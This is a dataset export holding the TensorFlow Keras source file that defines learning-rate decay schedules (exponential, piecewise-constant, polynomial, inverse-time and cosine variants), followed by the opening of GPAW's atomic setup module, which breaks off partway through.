text
stringlengths 12
1.05M
| repo_name
stringlengths 5
86
| path
stringlengths 4
191
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 12
1.05M
| keyword
listlengths 1
23
| text_hash
stringlengths 64
64
|
|---|---|---|---|---|---|---|---|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Various learning rate decay functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import math
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.keras.utils import generic_utils
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.optimizers.schedules.LearningRateSchedule")
class LearningRateSchedule(object):
"""A serializable learning rate decay schedule.
`LearningRateSchedule`s can be passed in as the learning rate of optimizers in
`tf.keras.optimizers`. They can be serialized and deserialized using
`tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
"""
@abc.abstractmethod
def __call__(self, step):
raise NotImplementedError("Learning rate schedule must override __call__")
@abc.abstractmethod
def get_config(self):
raise NotImplementedError("Learning rate schedule must override get_config")
@classmethod
def from_config(cls, config):
"""Instantiates a `LearningRateSchedule` from its config.
Args:
config: Output of `get_config()`.
Returns:
A `LearningRateSchedule` instance.
"""
return cls(**config)
@keras_export("keras.optimizers.schedules.ExponentialDecay")
class ExponentialDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses an exponential decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
decay_rate,
staircase=False,
name=None):
"""Applies exponential decay to the learning rate.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies an exponential decay function
to an optimizer step, given a provided initial learning rate.
The schedule a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
return initial_learning_rate * decay_rate ^ (step / decay_steps)
```
If the argument `staircase` is `True`, then `step / decay_steps` is
an integer division and the decayed learning rate follows a
staircase function.
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate.
Example: When fitting a Keras model, decay every 100000 steps with a base
of 0.96:
```python
initial_learning_rate = 0.1
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
initial_learning_rate,
decay_steps=100000,
decay_rate=0.96,
staircase=True)
model.compile(optimizer=tf.keras.optimizers.SGD(learning_rate=lr_schedule),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels, epochs=5)
```
The learning rate schedule is also serializable and deserializable using
`tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Must be positive. See the decay computation above.
decay_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The decay rate.
staircase: Boolean. If `True` decay the learning rate at discrete
intervals
name: String. Optional name of the operation. Defaults to
'ExponentialDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(ExponentialDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.decay_rate = decay_rate
self.staircase = staircase
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "ExponentialDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
decay_rate = math_ops.cast(self.decay_rate, dtype)
global_step_recomp = math_ops.cast(step, dtype)
p = global_step_recomp / decay_steps
if self.staircase:
p = math_ops.floor(p)
return math_ops.multiply(
initial_learning_rate, math_ops.pow(decay_rate, p), name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"decay_rate": self.decay_rate,
"staircase": self.staircase,
"name": self.name
}
@keras_export("keras.optimizers.schedules.PiecewiseConstantDecay")
class PiecewiseConstantDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a piecewise constant decay schedule."""
def __init__(
self,
boundaries,
values,
name=None):
"""Piecewise constant from boundaries and interval values.
The function returns a 1-arg callable to compute the piecewise constant
when passed the current optimizer step. This can be useful for changing the
learning rate value across different invocations of optimizer functions.
Example: use a learning rate that's 1.0 for the first 100001 steps, 0.5
for the next 10000 steps, and 0.1 for any additional steps.
```python
step = tf.Variable(0, trainable=False)
boundaries = [100000, 110000]
values = [1.0, 0.5, 0.1]
learning_rate_fn = keras.optimizers.schedules.PiecewiseConstantDecay(
boundaries, values)
# Later, whenever we perform an optimization step, we pass in the step.
learning_rate = learning_rate_fn(step)
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
boundaries: A list of `Tensor`s or `int`s or `float`s with strictly
increasing entries, and with all elements having the same type as the
optimizer step.
values: A list of `Tensor`s or `float`s or `int`s that specifies the
values for the intervals defined by `boundaries`. It should have one
more element than `boundaries`, and all elements should have the same
type.
name: A string. Optional name of the operation. Defaults to
'PiecewiseConstant'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as the boundary tensors.
The output of the 1-arg function that takes the `step`
is `values[0]` when `step <= boundaries[0]`,
`values[1]` when `step > boundaries[0]` and `step <= boundaries[1]`, ...,
and values[-1] when `step > boundaries[-1]`.
Raises:
ValueError: if the number of elements in the lists do not match.
"""
super(PiecewiseConstantDecay, self).__init__()
if len(boundaries) != len(values) - 1:
raise ValueError(
"The length of boundaries should be 1 less than the length of values")
self.boundaries = boundaries
self.values = values
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "PiecewiseConstant"):
boundaries = ops.convert_n_to_tensor(self.boundaries)
values = ops.convert_n_to_tensor(self.values)
x_recomp = ops.convert_to_tensor(step)
for i, b in enumerate(boundaries):
if b.dtype.base_dtype != x_recomp.dtype.base_dtype:
# We cast the boundaries to have the same type as the step
b = math_ops.cast(b, x_recomp.dtype.base_dtype)
boundaries[i] = b
pred_fn_pairs = []
pred_fn_pairs.append((x_recomp <= boundaries[0], lambda: values[0]))
pred_fn_pairs.append((x_recomp > boundaries[-1], lambda: values[-1]))
for low, high, v in zip(boundaries[:-1], boundaries[1:], values[1:-1]):
# Need to bind v here; can do this with lambda v=v: ...
pred = (x_recomp > low) & (x_recomp <= high)
pred_fn_pairs.append((pred, lambda v=v: v))
# The default isn't needed here because our conditions are mutually
# exclusive and exhaustive, but tf.case requires it.
default = lambda: values[0]
return control_flow_ops.case(pred_fn_pairs, default, exclusive=True)
def get_config(self):
return {
"boundaries": self.boundaries,
"values": self.values,
"name": self.name
}
@keras_export("keras.optimizers.schedules.PolynomialDecay")
class PolynomialDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a polynomial decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
end_learning_rate=0.0001,
power=1.0,
cycle=False,
name=None):
"""Applies a polynomial decay to the learning rate.
It is commonly observed that a monotonically decreasing learning rate, whose
degree of change is carefully chosen, results in a better performing model.
This schedule applies a polynomial decay function to an optimizer step,
given a provided `initial_learning_rate`, to reach an `end_learning_rate`
in the given `decay_steps`.
It requires a `step` value to compute the decayed learning rate. You
can just pass a TensorFlow variable that you increment at each training
step.
The schedule is a 1-arg callable that produces a decayed learning rate
when passed the current optimizer step. This can be useful for changing the
learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
return ((initial_learning_rate - end_learning_rate) *
(1 - step / decay_steps) ^ (power)
) + end_learning_rate
```
If `cycle` is True then a multiple of `decay_steps` is used, the first one
that is bigger than `step`.
```python
def decayed_learning_rate(step):
decay_steps = decay_steps * ceil(step / decay_steps)
return ((initial_learning_rate - end_learning_rate) *
(1 - step / decay_steps) ^ (power)
) + end_learning_rate
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate.
Example: Fit a model while decaying from 0.1 to 0.01 in 10000 steps using
sqrt (i.e. power=0.5):
```python
...
starter_learning_rate = 0.1
end_learning_rate = 0.01
decay_steps = 10000
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
starter_learning_rate,
decay_steps,
end_learning_rate,
power=0.5)
model.compile(optimizer=tf.keras.optimizers.SGD(
learning_rate=learning_rate_fn),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels, epochs=5)
```
The learning rate schedule is also serializable and deserializable using
`tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Must be positive. See the decay computation above.
end_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The minimal end learning rate.
power: A scalar `float32` or `float64` `Tensor` or a
Python number. The power of the polynomial. Defaults to linear, 1.0.
cycle: A boolean, whether or not it should cycle beyond decay_steps.
name: String. Optional name of the operation. Defaults to
'PolynomialDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(PolynomialDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.end_learning_rate = end_learning_rate
self.power = power
self.cycle = cycle
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "PolynomialDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
end_learning_rate = math_ops.cast(self.end_learning_rate, dtype)
power = math_ops.cast(self.power, dtype)
global_step_recomp = math_ops.cast(step, dtype)
decay_steps_recomp = math_ops.cast(self.decay_steps, dtype)
if self.cycle:
# Find the first multiple of decay_steps that is bigger than
# global_step. If global_step is zero set the multiplier to 1
multiplier = control_flow_ops.cond(
math_ops.equal(global_step_recomp, 0), lambda: 1.0,
lambda: math_ops.ceil(global_step_recomp / self.decay_steps))
decay_steps_recomp = math_ops.multiply(decay_steps_recomp, multiplier)
else:
# Make sure that the global_step used is not bigger than decay_steps.
global_step_recomp = math_ops.minimum(global_step_recomp,
self.decay_steps)
p = math_ops.divide(global_step_recomp, decay_steps_recomp)
return math_ops.add(
math_ops.multiply(initial_learning_rate - end_learning_rate,
math_ops.pow(1 - p, power)),
end_learning_rate,
name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"end_learning_rate": self.end_learning_rate,
"power": self.power,
"cycle": self.cycle,
"name": self.name
}
@keras_export("keras.optimizers.schedules.InverseTimeDecay")
class InverseTimeDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses an inverse time decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
decay_rate,
staircase=False,
name=None):
"""Applies inverse time decay to the initial learning rate.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies the inverse decay function
to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
return initial_learning_rate / (1 + decay_rate * step / decay_step)
```
or, if `staircase` is `True`, as:
```python
def decayed_learning_rate(step):
return initial_learning_rate / (1 + decay_rate * floor(step / decay_step))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate.
Example: Fit a Keras model when decaying 1/t with a rate of 0.5:
```python
...
initial_learning_rate = 0.1
decay_steps = 1.0
decay_rate = 0.5
learning_rate_fn = keras.optimizers.schedules.InverseTimeDecay(
initial_learning_rate, decay_steps, decay_rate)
model.compile(optimizer=tf.keras.optimizers.SGD(
learning_rate=learning_rate_fn),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(data, labels, epochs=5)
```
Args:
initial_learning_rate: A scalar `float32` or `float64` `Tensor` or a
Python number. The initial learning rate.
decay_steps: How often to apply decay.
decay_rate: A Python number. The decay rate.
staircase: Whether to apply decay in a discrete staircase, as opposed to
continuous, fashion.
name: String. Optional name of the operation. Defaults to
'InverseTimeDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(InverseTimeDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.decay_rate = decay_rate
self.staircase = staircase
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "InverseTimeDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
decay_rate = math_ops.cast(self.decay_rate, dtype)
global_step_recomp = math_ops.cast(step, dtype)
p = global_step_recomp / decay_steps
if self.staircase:
p = math_ops.floor(p)
const = math_ops.cast(constant_op.constant(1), dtype)
denom = math_ops.add(const, math_ops.multiply(decay_rate, p))
return math_ops.divide(initial_learning_rate, denom, name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"decay_rate": self.decay_rate,
"staircase": self.staircase,
"name": self.name
}
@keras_export("keras.experimental.CosineDecay")
class CosineDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a cosine decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
alpha=0.0,
name=None):
"""Applies cosine decay to the learning rate.
See [Loshchilov & Hutter, ICLR2016], SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a cosine decay function
to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
cosine_decay = 0.5 * (1 + cos(pi * step / decay_steps))
decayed = (1 - alpha) * cosine_decay + alpha
return initial_learning_rate * decayed
```
Example usage:
```python
decay_steps = 1000
lr_decayed_fn = tf.keras.experimental.CosineDecay(
initial_learning_rate, decay_steps)
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a
Python number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Number of steps to decay over.
alpha: A scalar `float32` or `float64` Tensor or a Python number.
Minimum learning rate value as a fraction of initial_learning_rate.
name: String. Optional name of the operation. Defaults to 'CosineDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(CosineDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.alpha = alpha
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "CosineDecay"):
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
global_step_recomp = math_ops.cast(step, dtype)
global_step_recomp = math_ops.minimum(global_step_recomp, decay_steps)
completed_fraction = global_step_recomp / decay_steps
cosine_decayed = 0.5 * (1.0 + math_ops.cos(
constant_op.constant(math.pi) * completed_fraction))
decayed = (1 - self.alpha) * cosine_decayed + self.alpha
return math_ops.multiply(initial_learning_rate, decayed)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"alpha": self.alpha,
"name": self.name
}
@keras_export("keras.experimental.CosineDecayRestarts")
class CosineDecayRestarts(LearningRateSchedule):
"""A LearningRateSchedule that uses a cosine decay schedule with restarts."""
def __init__(
self,
initial_learning_rate,
first_decay_steps,
t_mul=2.0,
m_mul=1.0,
alpha=0.0,
name=None):
"""Applies cosine decay with restarts to the learning rate.
See [Loshchilov & Hutter, ICLR2016], SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a cosine decay function with
restarts to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
The learning rate multiplier first decays
from 1 to `alpha` for `first_decay_steps` steps. Then, a warm
restart is performed. Each new warm restart runs for `t_mul` times more
steps and with `m_mul` times smaller initial learning rate.
Example usage:
```python
first_decay_steps = 1000
lr_decayed_fn = (
tf.keras.experimental.CosineDecayRestarts(
initial_learning_rate,
first_decay_steps))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a Python
number. The initial learning rate.
first_decay_steps: A scalar `int32` or `int64` `Tensor` or a Python
number. Number of steps to decay over.
t_mul: A scalar `float32` or `float64` `Tensor` or a Python number.
Used to derive the number of iterations in the i-th period
m_mul: A scalar `float32` or `float64` `Tensor` or a Python number.
Used to derive the initial learning rate of the i-th period:
alpha: A scalar `float32` or `float64` Tensor or a Python number.
Minimum learning rate value as a fraction of the initial_learning_rate.
name: String. Optional name of the operation. Defaults to 'SGDRDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(CosineDecayRestarts, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.first_decay_steps = first_decay_steps
self._t_mul = t_mul
self._m_mul = m_mul
self.alpha = alpha
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "SGDRDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
first_decay_steps = math_ops.cast(self.first_decay_steps, dtype)
alpha = math_ops.cast(self.alpha, dtype)
t_mul = math_ops.cast(self._t_mul, dtype)
m_mul = math_ops.cast(self._m_mul, dtype)
global_step_recomp = math_ops.cast(step, dtype)
completed_fraction = global_step_recomp / first_decay_steps
def compute_step(completed_fraction, geometric=False):
"""Helper for `cond` operation."""
if geometric:
i_restart = math_ops.floor(
math_ops.log(1.0 - completed_fraction * (1.0 - t_mul)) /
math_ops.log(t_mul))
sum_r = (1.0 - t_mul**i_restart) / (1.0 - t_mul)
completed_fraction = (completed_fraction - sum_r) / t_mul**i_restart
else:
i_restart = math_ops.floor(completed_fraction)
completed_fraction -= i_restart
return i_restart, completed_fraction
i_restart, completed_fraction = control_flow_ops.cond(
math_ops.equal(t_mul, 1.0),
lambda: compute_step(completed_fraction, geometric=False),
lambda: compute_step(completed_fraction, geometric=True))
m_fac = m_mul**i_restart
cosine_decayed = 0.5 * m_fac * (1.0 + math_ops.cos(
constant_op.constant(math.pi) * completed_fraction))
decayed = (1 - alpha) * cosine_decayed + alpha
return math_ops.multiply(initial_learning_rate, decayed, name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"first_decay_steps": self.first_decay_steps,
"t_mul": self._t_mul,
"m_mul": self._m_mul,
"alpha": self.alpha,
"name": self.name
}
@keras_export("keras.experimental.LinearCosineDecay")
class LinearCosineDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a linear cosine decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
num_periods=0.5,
alpha=0.0,
beta=0.001,
name=None):
"""Applies linear cosine decay to the learning rate.
See [Bello et al., ICML2017] Neural Optimizer Search with RL.
https://arxiv.org/abs/1709.07417
For the idea of warm starts here controlled by `num_periods`,
see [Loshchilov & Hutter, ICLR2016] SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
Note that linear cosine decay is more aggressive than cosine decay and
larger initial learning rates can typically be used.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a linear cosine decay
function to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
linear_decay = (decay_steps - step) / decay_steps
cosine_decay = 0.5 * (
1 + cos(pi * 2 * num_periods * step / decay_steps))
decayed = (alpha + linear_decay) * cosine_decay + beta
return initial_learning_rate * decayed
```
Example usage:
```python
decay_steps = 1000
lr_decayed_fn = (
tf.keras.experimental.LinearCosineDecay(
initial_learning_rate, decay_steps))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a Python
number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Number of steps to decay over.
num_periods: Number of periods in the cosine part of the decay.
See computation above.
alpha: See computation above.
beta: See computation above.
name: String. Optional name of the operation. Defaults to
'LinearCosineDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(LinearCosineDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.num_periods = num_periods
self.alpha = alpha
self.beta = beta
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "LinearCosineDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
num_periods = math_ops.cast(self.num_periods, dtype)
alpha = math_ops.cast(self.alpha, dtype)
beta = math_ops.cast(self.beta, dtype)
global_step_recomp = math_ops.cast(step, dtype)
global_step_recomp = math_ops.minimum(global_step_recomp, decay_steps)
linear_decayed = (decay_steps - global_step_recomp) / decay_steps
completed_fraction = global_step_recomp / decay_steps
fraction = 2.0 * num_periods * completed_fraction
cosine_decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
linear_cosine_decayed = (alpha + linear_decayed) * cosine_decayed + beta
return math_ops.multiply(initial_learning_rate, linear_cosine_decayed,
name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"num_periods": self.num_periods,
"alpha": self.alpha,
"beta": self.beta,
"name": self.name
}
@keras_export("keras.experimental.NoisyLinearCosineDecay")
class NoisyLinearCosineDecay(LearningRateSchedule):
"""A LearningRateSchedule that uses a noisy linear cosine decay schedule."""
def __init__(
self,
initial_learning_rate,
decay_steps,
initial_variance=1.0,
variance_decay=0.55,
num_periods=0.5,
alpha=0.0,
beta=0.001,
name=None):
"""Applies noisy linear cosine decay to the learning rate.
See [Bello et al., ICML2017] Neural Optimizer Search with RL.
https://arxiv.org/abs/1709.07417
For the idea of warm starts here controlled by `num_periods`,
see [Loshchilov & Hutter, ICLR2016] SGDR: Stochastic Gradient Descent
with Warm Restarts. https://arxiv.org/abs/1608.03983
Note that linear cosine decay is more aggressive than cosine decay and
larger initial learning rates can typically be used.
When training a model, it is often recommended to lower the learning rate as
the training progresses. This schedule applies a noisy linear cosine decay
function to an optimizer step, given a provided initial learning rate.
It requires a `step` value to compute the decayed learning rate. You can
just pass a TensorFlow variable that you increment at each training step.
The schedule a 1-arg callable that produces a decayed learning
rate when passed the current optimizer step. This can be useful for changing
the learning rate value across different invocations of optimizer functions.
It is computed as:
```python
def decayed_learning_rate(step):
step = min(step, decay_steps)
linear_decay = (decay_steps - step) / decay_steps)
cosine_decay = 0.5 * (
1 + cos(pi * 2 * num_periods * step / decay_steps))
decayed = (alpha + linear_decay + eps_t) * cosine_decay + beta
return initial_learning_rate * decayed
```
where eps_t is 0-centered gaussian noise with variance
initial_variance / (1 + global_step) ** variance_decay
Example usage:
```python
decay_steps = 1000
lr_decayed_fn = (
tf.keras.experimental.NoisyLinearCosineDecay(
initial_learning_rate, decay_steps))
```
You can pass this schedule directly into a `tf.keras.optimizers.Optimizer`
as the learning rate. The learning rate schedule is also serializable and
deserializable using `tf.keras.optimizers.schedules.serialize` and
`tf.keras.optimizers.schedules.deserialize`.
Args:
initial_learning_rate: A scalar `float32` or `float64` Tensor or a Python
number. The initial learning rate.
decay_steps: A scalar `int32` or `int64` `Tensor` or a Python number.
Number of steps to decay over.
initial_variance: initial variance for the noise. See computation above.
variance_decay: decay for the noise's variance. See computation above.
num_periods: Number of periods in the cosine part of the decay.
See computation above.
alpha: See computation above.
beta: See computation above.
name: String. Optional name of the operation. Defaults to
'NoisyLinearCosineDecay'.
Returns:
A 1-arg callable learning rate schedule that takes the current optimizer
step and outputs the decayed learning rate, a scalar `Tensor` of the same
type as `initial_learning_rate`.
"""
super(NoisyLinearCosineDecay, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.decay_steps = decay_steps
self.initial_variance = initial_variance
self.variance_decay = variance_decay
self.num_periods = num_periods
self.alpha = alpha
self.beta = beta
self.name = name
def __call__(self, step):
with ops.name_scope_v2(self.name or "NoisyLinearCosineDecay") as name:
initial_learning_rate = ops.convert_to_tensor(
self.initial_learning_rate, name="initial_learning_rate")
dtype = initial_learning_rate.dtype
decay_steps = math_ops.cast(self.decay_steps, dtype)
initial_variance = math_ops.cast(self.initial_variance, dtype)
variance_decay = math_ops.cast(self.variance_decay, dtype)
num_periods = math_ops.cast(self.num_periods, dtype)
alpha = math_ops.cast(self.alpha, dtype)
beta = math_ops.cast(self.beta, dtype)
global_step_recomp = math_ops.cast(step, dtype)
global_step_recomp = math_ops.minimum(global_step_recomp, decay_steps)
linear_decayed = (decay_steps - global_step_recomp) / decay_steps
variance = initial_variance / (
math_ops.pow(1.0 + global_step_recomp, variance_decay))
std = math_ops.sqrt(variance)
noisy_linear_decayed = (
linear_decayed + random_ops.random_normal(
linear_decayed.shape, stddev=std))
completed_fraction = global_step_recomp / decay_steps
fraction = 2.0 * num_periods * completed_fraction
cosine_decayed = 0.5 * (
1.0 + math_ops.cos(constant_op.constant(math.pi) * fraction))
noisy_linear_cosine_decayed = (
(alpha + noisy_linear_decayed) * cosine_decayed + beta)
return math_ops.multiply(
initial_learning_rate, noisy_linear_cosine_decayed, name=name)
def get_config(self):
return {
"initial_learning_rate": self.initial_learning_rate,
"decay_steps": self.decay_steps,
"initial_variance": self.initial_variance,
"variance_decay": self.variance_decay,
"num_periods": self.num_periods,
"alpha": self.alpha,
"beta": self.beta,
"name": self.name
}
@keras_export("keras.optimizers.schedules.serialize")
def serialize(learning_rate_schedule):
return generic_utils.serialize_keras_object(learning_rate_schedule)
@keras_export("keras.optimizers.schedules.deserialize")
def deserialize(config, custom_objects=None):
return generic_utils.deserialize_keras_object(
config,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name="decay")
|
chemelnucfin/tensorflow
|
tensorflow/python/keras/optimizer_v2/learning_rate_schedule.py
|
Python
|
apache-2.0
| 38,679
|
[
"Gaussian"
] |
363e9d78f9a82bb494b08ef0a636fbd97d2cf0df32094aeb667fd263f326d4d9
|
# -*- coding: utf-8 -*-
# Copyright (C) 2003 CAMP
# Please see the accompanying LICENSE file for further information.
if __name__ == '__main__':
print """\
You are using the wrong setup.py script! This setup.py defines a
Setup class used to hold the atomic data needed for a specific atom.
For building the GPAW code you must use the setup.py distutils script
at the root of the code tree. Just do "cd .." and you will be at the
right place."""
raise SystemExit
import os
import sys
from math import pi, sqrt
import numpy as np
from ase.data import atomic_names, chemical_symbols, atomic_numbers
from gpaw.setup_data import SetupData
from gpaw.basis_data import Basis
from gpaw.gaunt import gaunt as G_LLL, Y_LLv
from gpaw.utilities import unpack, pack
from gpaw.rotation import rotation
from gpaw import extra_parameters
from gpaw.atom.radialgd import AERadialGridDescriptor
from gpaw.xc import XC
def create_setup(symbol, xc='LDA', lmax=0,
type='paw', basis=None, setupdata=None, world=None):
if isinstance(xc, str):
xc = XC(xc)
if setupdata is None:
if type == 'hgh' or type == 'hgh.sc':
lmax = 0
from gpaw.hgh import HGHSetupData, setups, sc_setups
if type == 'hgh.sc':
table = sc_setups
else:
table = setups
parameters = table[symbol]
setupdata = HGHSetupData(parameters)
elif type == 'ah':
from gpaw.ah import AppelbaumHamann
ah = AppelbaumHamann()
ah.build(basis)
return ah
